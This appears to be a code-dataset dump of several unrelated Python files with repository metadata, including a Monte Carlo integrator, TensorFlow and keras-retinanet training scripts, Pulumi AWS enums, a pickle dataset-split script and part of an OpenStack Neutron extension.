87456d476ecee45b8a06782da12baa1ce4c08e88
|
[
"BSD-3-Clause"
] | null | null | null |
"""
This function implements 1d Monte Carlo integration
"""
import numpy as np
def monte_1d(x, f, trials):
"""
Compute a 1D definite integral
Parameters
----------
f : function
User defined function.
x : numpy array
Integration domain.
trials : integer
Total number of generated random samples.
Returns
-------
I : float
Integration result.
"""
a = x[0]
b = x[1]
d = (b - a) * np.random.rand(1, trials) + a
y = f(d)
print('Test addition')
return (b-a) * np.sum(y) / trials
| 19.166667
| 52
| 0.553043
|
"""
This function implements 1d Monte Carlo integration
"""
import numpy as np
def monte_1d(x, f, trials):
"""
Compute a 1D definite integral
Parameters
----------
f : function
User defined function.
x : numpy array
Integration domain.
trials : integer
Total number of generated random samples.
Returns
-------
I : float
Integration result.
"""
a = x[0]
b = x[1]
d = (b - a) * np.random.rand(1, trials) + a
y = f(d)
print('Test addition')
return (b-a) * np.sum(y) / trials
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
138fa2e645bcd4f89b72e76fa68172d58825add1
| 3,047
|
py
|
Python
|
snip/train.py
|
3846chs/SNIP
|
de1771cf4c90edeaa9924ed406293b48ceece7a2
|
[
"MIT"
] | null | null | null |
snip/train.py
|
3846chs/SNIP
|
de1771cf4c90edeaa9924ed406293b48ceece7a2
|
[
"MIT"
] | null | null | null |
snip/train.py
|
3846chs/SNIP
|
de1771cf4c90edeaa9924ed406293b48ceece7a2
|
[
"MIT"
] | null | null | null |
# np.random._bit_generator = np.random.bit_generator
| 45.477612
| 99
| 0.596652
|
import os
import tensorflow.compat.v1 as tf
import time
import numpy as np
# np.random._bit_generator = np.random.bit_generator
from augment import augment
def train(args, model, sess, dataset):
print('|========= START TRAINING =========|')
if not os.path.isdir(args.path_summary): os.makedirs(args.path_summary)
if not os.path.isdir(args.path_model): os.makedirs(args.path_model)
saver = tf.train.Saver()
random_state = np.random.RandomState(9)
writer = {}
writer['train'] = tf.summary.FileWriter(args.path_summary + '/train', sess.graph)
writer['val'] = tf.summary.FileWriter(args.path_summary + '/val')
t_start = time.time()
best_val_loss = 100
for itr in range(args.train_iterations):
batch = dataset.get_next_batch('train', args.training_batch_size)
batch = augment(batch, args.aug_kinds, random_state)
feed_dict = {}
feed_dict.update({model.inputs[key]: batch[key] for key in ['input', 'label']})
feed_dict.update({model.compress: False, model.is_train: True, model.pruned: True})
input_tensors = [model.outputs] # always execute the graph outputs
if (itr+1) % args.check_interval == 0:
input_tensors.extend([model.summ_op, model.sparsity])
input_tensors.extend([model.train_op])
result = sess.run(input_tensors, feed_dict)
# Check on validation set.
if (itr+1) % args.check_interval == 0:
batch = dataset.get_next_batch('val', args.training_batch_size)
batch = augment(batch, args.aug_kinds, random_state)
feed_dict = {}
feed_dict.update({model.inputs[key]: batch[key] for key in ['input', 'label']})
feed_dict.update({model.compress: False, model.is_train: False, model.pruned: True})
input_tensors = [model.outputs, model.summ_op, model.sparsity]
result_val = sess.run(input_tensors, feed_dict)
# Check summary and print results
if (itr+1) % args.check_interval == 0:
writer['train'].add_summary(result[1], itr)
writer['val'].add_summary(result_val[1], itr)
pstr = '(train/val) los:{:.3f}/{:.3f} acc:{:.3f}/{:.3f} spa:{:.3f} lr:{:.7f}'.format(
result[0]['los'], result_val[0]['los'],
result[0]['acc'], result_val[0]['acc'],
result[2], result[0]['lr'],
)
print('itr{}: {} (t:{:.1f})'.format(itr+1, pstr, time.time() - t_start))
t_start = time.time()
# Save model
if best_val_loss > result_val[0]['los']:
print('save model, becase best_val_loss({:.3f}) > current_val_loss({:.3f})'.format(
best_val_loss, result_val[0]['los']
))
saver.save(sess, args.path_model + '/itr-' + str(itr))
best_val_loss = result_val[0]['los']
# # Save model
# if (itr+1) % args.save_interval == 0:
# saver.save(sess, args.path_model + '/itr-' + str(itr))
| 0
| 0
| 0
| 0
| 0
| 2,866
| 0
| -7
| 134
|
0e58e67d4649d5ef878008d9074dacf7645f53e2
| 4,768
|
py
|
Python
|
m1_resnet.py
|
VinGPan/Kaggle-HumanProtein
|
4d1abcc7f46774355644d30428ed6c73b28fd782
|
[
"Apache-2.0"
] | null | null | null |
m1_resnet.py
|
VinGPan/Kaggle-HumanProtein
|
4d1abcc7f46774355644d30428ed6c73b28fd782
|
[
"Apache-2.0"
] | null | null | null |
m1_resnet.py
|
VinGPan/Kaggle-HumanProtein
|
4d1abcc7f46774355644d30428ed6c73b28fd782
|
[
"Apache-2.0"
] | null | null | null |
from keras_retinanet.bin.train import train_main
import os
if __name__ == '__main__':
os.chdir("../")
model_name = 'resnet101'
train_main(0, None, ["csv", "data/trn1.csv", "data/classes.csv",
"--val-annotations", "data/val1.csv"])
# model_name = 'resnet50'
# h5s = glob.glob("run1_resnet_50/*.h5")
# results = []
# best_f1 = 0
# for h5 in h5s:
# y_true, y_pred = train_main(1, h5, ["csv", "data/trn1.csv", "data/classes.csv",
# "--val-annotations", "data/val1.csv"])
# f1_max = 0
# th_max = 0
# pr_cnt_max = 0
# for th in np.linspace(0.0, 1.0, num=21):
# for pr_cnt in range(1, 7):
# y_pred_new = []
# for prd in y_pred:
# ref_p = prd[(np.argsort(prd))[-pr_cnt]]
# dec = (prd >= ref_p) & (prd >= th)
# y_pred_new.append(dec)
# f1_cur = f1_score(y_true, np.array(y_pred_new, dtype='int'), average='macro')
# if f1_cur >= f1_max:
# f1_max = f1_cur
# th_max = th
# pr_cnt_max = pr_cnt
# results.append((h5, th_max, pr_cnt_max, f1_max))
# print([h5, th_max, pr_cnt_max, f1_max])
# if f1_max >= best_f1:
# best_f1 = f1_max
# print("current best = ", best_f1)
#
# results = sorted(results, key=lambda x:x[-1], reverse=True)
# for r in results:
# print(r)
#[('snapshots\\resnet50_csv_44.h5', 0.05, 0.44536340852130324), ('snapshots\\resnet50_csv_48.h5', 0.05, 0.445054945054945), ('snapshots\\resnet50_csv_34.h5', 0.05, 0.437181855500821), ('snapshots\\resnet50_csv_49.h5', 0.0, 0.4327235488525811), ('snapshots\\resnet50_csv_45.h5', 0.05, 0.42369674185463657), ('snapshots\\resnet50_csv_28.h5', 0.0, 0.41797258297258294), ('snapshots\\resnet50_csv_22.h5', 0.1, 0.40782312925170067), ('snapshots\\resnet50_csv_30.h5', 0.05, 0.40745030745030747), ('snapshots\\resnet50_csv_50.h5', 0.1, 0.4013157894736842), ('snapshots\\resnet50_csv_37.h5', 0.0, 0.39436633627810097), ('snapshots\\resnet50_csv_47.h5', 0.0, 0.3908092403628118), ('snapshots\\resnet50_csv_41.h5', 0.2, 0.38839285714285715), ('snapshots\\resnet50_csv_35.h5', 0.15000000000000002, 0.38822228496141536), ('snapshots\\resnet50_csv_36.h5', 0.1, 0.38399981614267326), ('snapshots\\resnet50_csv_43.h5', 0.05, 0.3828025149453721), ('snapshots\\resnet50_csv_17.h5', 0.15000000000000002, 0.3746598639455782), ('snapshots\\resnet50_csv_21.h5', 0.05, 0.37316799237981496), ('snapshots\\resnet50_csv_29.h5', 0.0, 0.3672226582940869), ('snapshots\\resnet50_csv_32.h5', 0.1, 0.3669642857142857), ('snapshots\\resnet50_csv_39.h5', 0.05, 0.3659983291562239), ('snapshots\\resnet50_csv_33.h5', 0.05, 0.36450650157546705), ('snapshots\\resnet50_csv_46.h5', 0.1, 0.3637418137418137), ('snapshots\\resnet50_csv_42.h5', 0.0, 0.3635427827546054), ('snapshots\\resnet50_csv_25.h5', 0.05, 0.36262793405650545), ('snapshots\\resnet50_csv_11.h5', 0.05, 0.3579434337837699), ('snapshots\\resnet50_csv_27.h5', 0.05, 0.3495562586818953), ('snapshots\\resnet50_csv_40.h5', 0.0, 0.3492804814233386), ('snapshots\\resnet50_csv_31.h5', 0.05, 0.348015873015873), ('snapshots\\resnet50_csv_38.h5', 0.0, 0.3360606404724052), ('snapshots\\resnet50_csv_18.h5', 0.05, 0.3308032303830623), ('snapshots\\resnet50_csv_16.h5', 0.1, 0.32845804988662136), ('snapshots\\resnet50_csv_14.h5', 0.05, 0.32814818234986304), ('snapshots\\resnet50_csv_26.h5', 0.1, 0.3254329004329004), ('snapshots\\resnet50_csv_19.h5', 0.05, 0.3204281712685074), ('snapshots\\resnet50_csv_15.h5', 0.0, 0.3152310924369747), ('snapshots\\resnet50_csv_20.h5', 0.1, 0.29930213464696226), ('snapshots\\resnet50_csv_10.h5', 0.05, 0.2901406742663109), ('snapshots\\resnet50_csv_13.h5', 0.1, 0.27293083900226756), ('snapshots\\resnet50_csv_24.h5', 0.1, 0.2708245722531437), ('snapshots\\resnet50_csv_12.h5', 0.1, 0.2673262853528508), ('snapshots\\resnet50_csv_23.h5', 0.1, 0.2638221955448846), ('snapshots\\resnet50_csv_04.h5', 0.25, 0.24969474969474967), ('snapshots\\resnet50_csv_09.h5', 0.05, 0.24739891704177416), ('snapshots\\resnet50_csv_05.h5', 0.2, 0.24424342105263158), ('snapshots\\resnet50_csv_06.h5', 0.15000000000000002, 0.23761446886446885), ('snapshots\\resnet50_csv_07.h5', 0.15000000000000002, 0.233078231292517), ('snapshots\\resnet50_csv_03.h5', 0.15000000000000002, 0.21793958962895502), ('snapshots\\resnet50_csv_01.h5', 0.05, 0.19410188317751345), ('snapshots\\resnet50_csv_02.h5', 0.05, 0.19065212731754366), ('snapshots\\resnet50_csv_08.h5', 0.15000000000000002, 0.18758503401360543)]
| 103.652174
| 3,138
| 0.676594
|
from keras_retinanet.bin.train import train_main
from keras_retinanet import models
import glob
import numpy as np
from sklearn.metrics import f1_score
import os
if __name__ == '__main__':
os.chdir("../")
model_name = 'resnet101'
train_main(0, None, ["csv", "data/trn1.csv", "data/classes.csv",
"--val-annotations", "data/val1.csv"])
# model_name = 'resnet50'
# h5s = glob.glob("run1_resnet_50/*.h5")
# results = []
# best_f1 = 0
# for h5 in h5s:
# y_true, y_pred = train_main(1, h5, ["csv", "data/trn1.csv", "data/classes.csv",
# "--val-annotations", "data/val1.csv"])
# f1_max = 0
# th_max = 0
# pr_cnt_max = 0
# for th in np.linspace(0.0, 1.0, num=21):
# for pr_cnt in range(1, 7):
# y_pred_new = []
# for prd in y_pred:
# ref_p = prd[(np.argsort(prd))[-pr_cnt]]
# dec = (prd >= ref_p) & (prd >= th)
# y_pred_new.append(dec)
# f1_cur = f1_score(y_true, np.array(y_pred_new, dtype='int'), average='macro')
# if f1_cur >= f1_max:
# f1_max = f1_cur
# th_max = th
# pr_cnt_max = pr_cnt
# results.append((h5, th_max, pr_cnt_max, f1_max))
# print([h5, th_max, pr_cnt_max, f1_max])
# if f1_max >= best_f1:
# best_f1 = f1_max
# print("current best = ", best_f1)
#
# results = sorted(results, key=lambda x:x[-1], reverse=True)
# for r in results:
# print(r)
#[('snapshots\\resnet50_csv_44.h5', 0.05, 0.44536340852130324), ('snapshots\\resnet50_csv_48.h5', 0.05, 0.445054945054945), ('snapshots\\resnet50_csv_34.h5', 0.05, 0.437181855500821), ('snapshots\\resnet50_csv_49.h5', 0.0, 0.4327235488525811), ('snapshots\\resnet50_csv_45.h5', 0.05, 0.42369674185463657), ('snapshots\\resnet50_csv_28.h5', 0.0, 0.41797258297258294), ('snapshots\\resnet50_csv_22.h5', 0.1, 0.40782312925170067), ('snapshots\\resnet50_csv_30.h5', 0.05, 0.40745030745030747), ('snapshots\\resnet50_csv_50.h5', 0.1, 0.4013157894736842), ('snapshots\\resnet50_csv_37.h5', 0.0, 0.39436633627810097), ('snapshots\\resnet50_csv_47.h5', 0.0, 0.3908092403628118), ('snapshots\\resnet50_csv_41.h5', 0.2, 0.38839285714285715), ('snapshots\\resnet50_csv_35.h5', 0.15000000000000002, 0.38822228496141536), ('snapshots\\resnet50_csv_36.h5', 0.1, 0.38399981614267326), ('snapshots\\resnet50_csv_43.h5', 0.05, 0.3828025149453721), ('snapshots\\resnet50_csv_17.h5', 0.15000000000000002, 0.3746598639455782), ('snapshots\\resnet50_csv_21.h5', 0.05, 0.37316799237981496), ('snapshots\\resnet50_csv_29.h5', 0.0, 0.3672226582940869), ('snapshots\\resnet50_csv_32.h5', 0.1, 0.3669642857142857), ('snapshots\\resnet50_csv_39.h5', 0.05, 0.3659983291562239), ('snapshots\\resnet50_csv_33.h5', 0.05, 0.36450650157546705), ('snapshots\\resnet50_csv_46.h5', 0.1, 0.3637418137418137), ('snapshots\\resnet50_csv_42.h5', 0.0, 0.3635427827546054), ('snapshots\\resnet50_csv_25.h5', 0.05, 0.36262793405650545), ('snapshots\\resnet50_csv_11.h5', 0.05, 0.3579434337837699), ('snapshots\\resnet50_csv_27.h5', 0.05, 0.3495562586818953), ('snapshots\\resnet50_csv_40.h5', 0.0, 0.3492804814233386), ('snapshots\\resnet50_csv_31.h5', 0.05, 0.348015873015873), ('snapshots\\resnet50_csv_38.h5', 0.0, 0.3360606404724052), ('snapshots\\resnet50_csv_18.h5', 0.05, 0.3308032303830623), ('snapshots\\resnet50_csv_16.h5', 0.1, 0.32845804988662136), ('snapshots\\resnet50_csv_14.h5', 0.05, 0.32814818234986304), ('snapshots\\resnet50_csv_26.h5', 0.1, 0.3254329004329004), ('snapshots\\resnet50_csv_19.h5', 0.05, 0.3204281712685074), ('snapshots\\resnet50_csv_15.h5', 0.0, 0.3152310924369747), ('snapshots\\resnet50_csv_20.h5', 0.1, 0.29930213464696226), ('snapshots\\resnet50_csv_10.h5', 0.05, 0.2901406742663109), ('snapshots\\resnet50_csv_13.h5', 0.1, 0.27293083900226756), ('snapshots\\resnet50_csv_24.h5', 0.1, 0.2708245722531437), ('snapshots\\resnet50_csv_12.h5', 0.1, 0.2673262853528508), ('snapshots\\resnet50_csv_23.h5', 0.1, 0.2638221955448846), ('snapshots\\resnet50_csv_04.h5', 0.25, 0.24969474969474967), ('snapshots\\resnet50_csv_09.h5', 0.05, 0.24739891704177416), ('snapshots\\resnet50_csv_05.h5', 0.2, 0.24424342105263158), ('snapshots\\resnet50_csv_06.h5', 0.15000000000000002, 0.23761446886446885), ('snapshots\\resnet50_csv_07.h5', 0.15000000000000002, 0.233078231292517), ('snapshots\\resnet50_csv_03.h5', 0.15000000000000002, 0.21793958962895502), ('snapshots\\resnet50_csv_01.h5', 0.05, 0.19410188317751345), ('snapshots\\resnet50_csv_02.h5', 0.05, 0.19065212731754366), ('snapshots\\resnet50_csv_08.h5', 0.15000000000000002, 0.18758503401360543)]
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 15
| 88
|
27d6a355d2304d3fc689d470c15bce5dbf127caf
| 5,795
|
py
|
Python
|
sdk/python/pulumi_aws_native/customerprofiles/_enums.py
|
AaronFriel/pulumi-aws-native
|
5621690373ac44accdbd20b11bae3be1baf022d1
|
[
"Apache-2.0"
] | 29
|
2021-09-30T19:32:07.000Z
|
2022-03-22T21:06:08.000Z
|
sdk/python/pulumi_aws_native/customerprofiles/_enums.py
|
AaronFriel/pulumi-aws-native
|
5621690373ac44accdbd20b11bae3be1baf022d1
|
[
"Apache-2.0"
] | 232
|
2021-09-30T19:26:26.000Z
|
2022-03-31T23:22:06.000Z
|
sdk/python/pulumi_aws_native/customerprofiles/_enums.py
|
AaronFriel/pulumi-aws-native
|
5621690373ac44accdbd20b11bae3be1baf022d1
|
[
"Apache-2.0"
] | 4
|
2021-11-10T19:42:01.000Z
|
2022-02-05T10:15:49.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
__all__ = [
'IntegrationConnectorType',
'IntegrationMarketoConnectorOperator',
'IntegrationOperatorPropertiesKeys',
'IntegrationS3ConnectorOperator',
'IntegrationSalesforceConnectorOperator',
'IntegrationScheduledTriggerPropertiesDataPullMode',
'IntegrationServiceNowConnectorOperator',
'IntegrationTaskType',
'IntegrationTriggerType',
'IntegrationZendeskConnectorOperator',
'ObjectTypeFieldContentType',
'ObjectTypeKeyStandardIdentifiersItem',
]
| 30.025907
| 80
| 0.718033
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from enum import Enum
__all__ = [
'IntegrationConnectorType',
'IntegrationMarketoConnectorOperator',
'IntegrationOperatorPropertiesKeys',
'IntegrationS3ConnectorOperator',
'IntegrationSalesforceConnectorOperator',
'IntegrationScheduledTriggerPropertiesDataPullMode',
'IntegrationServiceNowConnectorOperator',
'IntegrationTaskType',
'IntegrationTriggerType',
'IntegrationZendeskConnectorOperator',
'ObjectTypeFieldContentType',
'ObjectTypeKeyStandardIdentifiersItem',
]
class IntegrationConnectorType(str, Enum):
SALESFORCE = "Salesforce"
MARKETO = "Marketo"
SERVICE_NOW = "ServiceNow"
ZENDESK = "Zendesk"
S3 = "S3"
class IntegrationMarketoConnectorOperator(str, Enum):
PROJECTION = "PROJECTION"
LESS_THAN = "LESS_THAN"
GREATER_THAN = "GREATER_THAN"
BETWEEN = "BETWEEN"
ADDITION = "ADDITION"
MULTIPLICATION = "MULTIPLICATION"
DIVISION = "DIVISION"
SUBTRACTION = "SUBTRACTION"
MASK_ALL = "MASK_ALL"
MASK_FIRST_N = "MASK_FIRST_N"
MASK_LAST_N = "MASK_LAST_N"
VALIDATE_NON_NULL = "VALIDATE_NON_NULL"
VALIDATE_NON_ZERO = "VALIDATE_NON_ZERO"
VALIDATE_NON_NEGATIVE = "VALIDATE_NON_NEGATIVE"
VALIDATE_NUMERIC = "VALIDATE_NUMERIC"
NO_OP = "NO_OP"
class IntegrationOperatorPropertiesKeys(str, Enum):
VALUE = "VALUE"
VALUES = "VALUES"
DATA_TYPE = "DATA_TYPE"
UPPER_BOUND = "UPPER_BOUND"
LOWER_BOUND = "LOWER_BOUND"
SOURCE_DATA_TYPE = "SOURCE_DATA_TYPE"
DESTINATION_DATA_TYPE = "DESTINATION_DATA_TYPE"
VALIDATION_ACTION = "VALIDATION_ACTION"
MASK_VALUE = "MASK_VALUE"
MASK_LENGTH = "MASK_LENGTH"
TRUNCATE_LENGTH = "TRUNCATE_LENGTH"
MATH_OPERATION_FIELDS_ORDER = "MATH_OPERATION_FIELDS_ORDER"
CONCAT_FORMAT = "CONCAT_FORMAT"
SUBFIELD_CATEGORY_MAP = "SUBFIELD_CATEGORY_MAP"
class IntegrationS3ConnectorOperator(str, Enum):
PROJECTION = "PROJECTION"
LESS_THAN = "LESS_THAN"
GREATER_THAN = "GREATER_THAN"
BETWEEN = "BETWEEN"
LESS_THAN_OR_EQUAL_TO = "LESS_THAN_OR_EQUAL_TO"
GREATER_THAN_OR_EQUAL_TO = "GREATER_THAN_OR_EQUAL_TO"
EQUAL_TO = "EQUAL_TO"
NOT_EQUAL_TO = "NOT_EQUAL_TO"
ADDITION = "ADDITION"
MULTIPLICATION = "MULTIPLICATION"
DIVISION = "DIVISION"
SUBTRACTION = "SUBTRACTION"
MASK_ALL = "MASK_ALL"
MASK_FIRST_N = "MASK_FIRST_N"
MASK_LAST_N = "MASK_LAST_N"
VALIDATE_NON_NULL = "VALIDATE_NON_NULL"
VALIDATE_NON_ZERO = "VALIDATE_NON_ZERO"
VALIDATE_NON_NEGATIVE = "VALIDATE_NON_NEGATIVE"
VALIDATE_NUMERIC = "VALIDATE_NUMERIC"
NO_OP = "NO_OP"
class IntegrationSalesforceConnectorOperator(str, Enum):
PROJECTION = "PROJECTION"
LESS_THAN = "LESS_THAN"
GREATER_THAN = "GREATER_THAN"
CONTAINS = "CONTAINS"
BETWEEN = "BETWEEN"
LESS_THAN_OR_EQUAL_TO = "LESS_THAN_OR_EQUAL_TO"
GREATER_THAN_OR_EQUAL_TO = "GREATER_THAN_OR_EQUAL_TO"
EQUAL_TO = "EQUAL_TO"
NOT_EQUAL_TO = "NOT_EQUAL_TO"
ADDITION = "ADDITION"
MULTIPLICATION = "MULTIPLICATION"
DIVISION = "DIVISION"
SUBTRACTION = "SUBTRACTION"
MASK_ALL = "MASK_ALL"
MASK_FIRST_N = "MASK_FIRST_N"
MASK_LAST_N = "MASK_LAST_N"
VALIDATE_NON_NULL = "VALIDATE_NON_NULL"
VALIDATE_NON_ZERO = "VALIDATE_NON_ZERO"
VALIDATE_NON_NEGATIVE = "VALIDATE_NON_NEGATIVE"
VALIDATE_NUMERIC = "VALIDATE_NUMERIC"
NO_OP = "NO_OP"
class IntegrationScheduledTriggerPropertiesDataPullMode(str, Enum):
INCREMENTAL = "Incremental"
COMPLETE = "Complete"
class IntegrationServiceNowConnectorOperator(str, Enum):
PROJECTION = "PROJECTION"
LESS_THAN = "LESS_THAN"
GREATER_THAN = "GREATER_THAN"
CONTAINS = "CONTAINS"
BETWEEN = "BETWEEN"
LESS_THAN_OR_EQUAL_TO = "LESS_THAN_OR_EQUAL_TO"
GREATER_THAN_OR_EQUAL_TO = "GREATER_THAN_OR_EQUAL_TO"
EQUAL_TO = "EQUAL_TO"
NOT_EQUAL_TO = "NOT_EQUAL_TO"
ADDITION = "ADDITION"
MULTIPLICATION = "MULTIPLICATION"
DIVISION = "DIVISION"
SUBTRACTION = "SUBTRACTION"
MASK_ALL = "MASK_ALL"
MASK_FIRST_N = "MASK_FIRST_N"
MASK_LAST_N = "MASK_LAST_N"
VALIDATE_NON_NULL = "VALIDATE_NON_NULL"
VALIDATE_NON_ZERO = "VALIDATE_NON_ZERO"
VALIDATE_NON_NEGATIVE = "VALIDATE_NON_NEGATIVE"
VALIDATE_NUMERIC = "VALIDATE_NUMERIC"
NO_OP = "NO_OP"
class IntegrationTaskType(str, Enum):
ARITHMETIC = "Arithmetic"
FILTER = "Filter"
MAP = "Map"
MASK = "Mask"
MERGE = "Merge"
TRUNCATE = "Truncate"
VALIDATE = "Validate"
class IntegrationTriggerType(str, Enum):
SCHEDULED = "Scheduled"
EVENT = "Event"
ON_DEMAND = "OnDemand"
class IntegrationZendeskConnectorOperator(str, Enum):
PROJECTION = "PROJECTION"
GREATER_THAN = "GREATER_THAN"
ADDITION = "ADDITION"
MULTIPLICATION = "MULTIPLICATION"
DIVISION = "DIVISION"
SUBTRACTION = "SUBTRACTION"
MASK_ALL = "MASK_ALL"
MASK_FIRST_N = "MASK_FIRST_N"
MASK_LAST_N = "MASK_LAST_N"
VALIDATE_NON_NULL = "VALIDATE_NON_NULL"
VALIDATE_NON_ZERO = "VALIDATE_NON_ZERO"
VALIDATE_NON_NEGATIVE = "VALIDATE_NON_NEGATIVE"
VALIDATE_NUMERIC = "VALIDATE_NUMERIC"
NO_OP = "NO_OP"
class ObjectTypeFieldContentType(str, Enum):
"""
The content type of the field. Used for determining equality when searching.
"""
STRING = "STRING"
NUMBER = "NUMBER"
PHONE_NUMBER = "PHONE_NUMBER"
EMAIL_ADDRESS = "EMAIL_ADDRESS"
NAME = "NAME"
class ObjectTypeKeyStandardIdentifiersItem(str, Enum):
PROFILE = "PROFILE"
UNIQUE = "UNIQUE"
SECONDARY = "SECONDARY"
LOOKUP_ONLY = "LOOKUP_ONLY"
NEW_ONLY = "NEW_ONLY"
| 0
| 0
| 0
| 4,820
| 0
| 0
| 0
| 0
| 299
|
2d12ec7f50c3d061e4b79a9ffffcc034bd787b1d
| 2,104
|
py
|
Python
|
Dataset/split_data.py
|
atmacvit/meronymnet
|
47e1a7caadc0f770439bb26a93b885f790f62804
|
[
"MIT"
] | 1
|
2021-11-02T05:13:12.000Z
|
2021-11-02T05:13:12.000Z
|
Dataset/split_data.py
|
atmacvit/meronymnet
|
47e1a7caadc0f770439bb26a93b885f790f62804
|
[
"MIT"
] | 1
|
2021-12-17T14:29:18.000Z
|
2021-12-17T14:29:18.000Z
|
Dataset/split_data.py
|
atmacvit/meronymnet
|
47e1a7caadc0f770439bb26a93b885f790f62804
|
[
"MIT"
] | null | null | null |
import pickle
objects = ['cow', 'dog', 'person', 'horse', 'sheep', 'aeroplane', 'bird', 'bicycle', 'cat', 'motorbike', 'car']
for object_name in objects:
with open(object_name + '_part_separated_labels', 'rb') as f:
label = pickle.load(f)
with open(object_name + '_part_separated_bbx', 'rb') as f:
box = pickle.load(f)
with open(object_name + '_part_separated_masks', 'rb') as f:
mask = pickle.load(f)
with open(object_name + '_images', 'rb') as f:
o_images = pickle.load(f)
size = len(label)
train_split = int((75/100)*size)
validation_split = int((10/100)*size)
test_split = int((15/100)*size)
#train
with open(object_name+'_train_label', 'wb') as f:
pickle.dump(label[0:train_split], f)
with open(object_name+'_train_bbx', 'wb') as f:
pickle.dump(box[0:train_split], f)
with open(object_name+'_train_masks', 'wb') as f:
pickle.dump(mask[0:train_split], f)
with open(object_name+'_train_images', 'wb') as f:
pickle.dump(o_images[0:train_split], f)
#vaidation
with open(object_name+'_validation_label', 'wb') as f:
pickle.dump(label[train_split:train_split+validation_split], f)
with open(object_name+'_validation_bbx', 'wb') as f:
pickle.dump(box[train_split:train_split+validation_split], f)
with open(object_name+'_validation_masks', 'wb') as f:
pickle.dump(mask[train_split:train_split+validation_split], f)
with open(object_name+'_validation_images', 'wb') as f:
pickle.dump(o_images[train_split:train_split+validation_split], f)
#test
with open(object_name+'_test_label', 'wb') as f:
pickle.dump(label[train_split+validation_split::], f)
with open(object_name+'_test_bbx', 'wb') as f:
pickle.dump(box[train_split+validation_split::], f)
with open(object_name+'_test_masks', 'wb') as f:
pickle.dump(mask[train_split+validation_split::], f)
with open(object_name+'_test_images', 'wb') as f:
pickle.dump(o_images[train_split+validation_split::], f)
| 41.254902
| 112
| 0.661122
|
import numpy as np
import pickle
objects = ['cow', 'dog', 'person', 'horse', 'sheep', 'aeroplane', 'bird', 'bicycle', 'cat', 'motorbike', 'car']
for object_name in objects:
with open(object_name + '_part_separated_labels', 'rb') as f:
label = pickle.load(f)
with open(object_name + '_part_separated_bbx', 'rb') as f:
box = pickle.load(f)
with open(object_name + '_part_separated_masks', 'rb') as f:
mask = pickle.load(f)
with open(object_name + '_images', 'rb') as f:
o_images = pickle.load(f)
size = len(label)
train_split = int((75/100)*size)
validation_split = int((10/100)*size)
test_split = int((15/100)*size)
#train
with open(object_name+'_train_label', 'wb') as f:
pickle.dump(label[0:train_split], f)
with open(object_name+'_train_bbx', 'wb') as f:
pickle.dump(box[0:train_split], f)
with open(object_name+'_train_masks', 'wb') as f:
pickle.dump(mask[0:train_split], f)
with open(object_name+'_train_images', 'wb') as f:
pickle.dump(o_images[0:train_split], f)
#vaidation
with open(object_name+'_validation_label', 'wb') as f:
pickle.dump(label[train_split:train_split+validation_split], f)
with open(object_name+'_validation_bbx', 'wb') as f:
pickle.dump(box[train_split:train_split+validation_split], f)
with open(object_name+'_validation_masks', 'wb') as f:
pickle.dump(mask[train_split:train_split+validation_split], f)
with open(object_name+'_validation_images', 'wb') as f:
pickle.dump(o_images[train_split:train_split+validation_split], f)
#test
with open(object_name+'_test_label', 'wb') as f:
pickle.dump(label[train_split+validation_split::], f)
with open(object_name+'_test_bbx', 'wb') as f:
pickle.dump(box[train_split+validation_split::], f)
with open(object_name+'_test_masks', 'wb') as f:
pickle.dump(mask[train_split+validation_split::], f)
with open(object_name+'_test_images', 'wb') as f:
pickle.dump(o_images[train_split+validation_split::], f)
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| -3
| 22
|
ae765890a283e1cafc55cfc222fa3eddff1f2a46
| 2,302
|
py
|
Python
|
neutron/extensions/providernet.py
|
MultipleCrashes/neutron
|
fb268d7e91b22192a6e42f78b0057b4ebd3033ef
|
[
"Apache-2.0"
] | 1
|
2019-06-02T06:15:39.000Z
|
2019-06-02T06:15:39.000Z
|
neutron/extensions/providernet.py
|
MultipleCrashes/neutron
|
fb268d7e91b22192a6e42f78b0057b4ebd3033ef
|
[
"Apache-2.0"
] | null | null | null |
neutron/extensions/providernet.py
|
MultipleCrashes/neutron
|
fb268d7e91b22192a6e42f78b0057b4ebd3033ef
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2012 OpenStack Foundation.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.api.definitions import provider_net
from neutron_lib.api import validators
from neutron_lib import exceptions as n_exc
from neutron._i18n import _
def _raise_if_updates_provider_attributes(attrs):
"""Raise exception if provider attributes are present.
This method is used for plugins that do not support
updating provider networks.
"""
if any(validators.is_attr_set(attrs.get(a))
for a in provider_net.ATTRIBUTES):
msg = _("Plugin does not support updating provider attributes")
raise n_exc.InvalidInput(error_message=msg)
| 32.885714
| 78
| 0.728931
|
# Copyright (c) 2012 OpenStack Foundation.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.api.definitions import provider_net
from neutron_lib.api import extensions
from neutron_lib.api import validators
from neutron_lib import exceptions as n_exc
from neutron._i18n import _
def _raise_if_updates_provider_attributes(attrs):
"""Raise exception if provider attributes are present.
This method is used for plugins that do not support
updating provider networks.
"""
if any(validators.is_attr_set(attrs.get(a))
for a in provider_net.ATTRIBUTES):
msg = _("Plugin does not support updating provider attributes")
raise n_exc.InvalidInput(error_message=msg)
class Providernet(extensions.ExtensionDescriptor):
"""Extension class supporting provider networks.
This class is used by neutron's extension framework to make
metadata about the provider network extension available to
clients. No new resources are defined by this extension. Instead,
the existing network resource's request and response messages are
